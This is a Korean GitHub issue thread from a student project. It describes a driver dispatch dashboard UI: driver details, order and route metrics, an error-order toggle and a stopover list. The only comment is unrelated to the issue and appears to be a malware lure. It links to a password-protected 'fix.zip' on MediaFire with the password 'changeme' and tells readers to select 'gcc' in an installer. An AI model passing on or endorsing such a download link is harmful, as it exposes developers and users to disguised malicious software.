### ISSUE TITLE
드라이버 배차 상세 대시보드 ui

### ISSUE THREAD

**Issue by ldh9669** [FastCampus-Final-Group2/finalproject#10]
### 📄 작업 대상

기사 목록 컴포넌트에 각각 부여된 색상의 사이드 탭을 누르면 해당 탭이 나온다.

### ✅ 작업 내용

기사명, 기사 연락처, 차량톤코드, 총 주문, 주행거리, 주행시간, 용적률 표시하고 오류 주문만 모아볼 수 있는 토글 스위치 ui가 존재한다.  그리고 해당 기사의 경유지 리스트를 볼 수 있다.

### ⏳ 추정 개발 시간

낙관적 : 2024-08-27까지 (2일)
비관적 : 2024-08-28까지 (3일)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
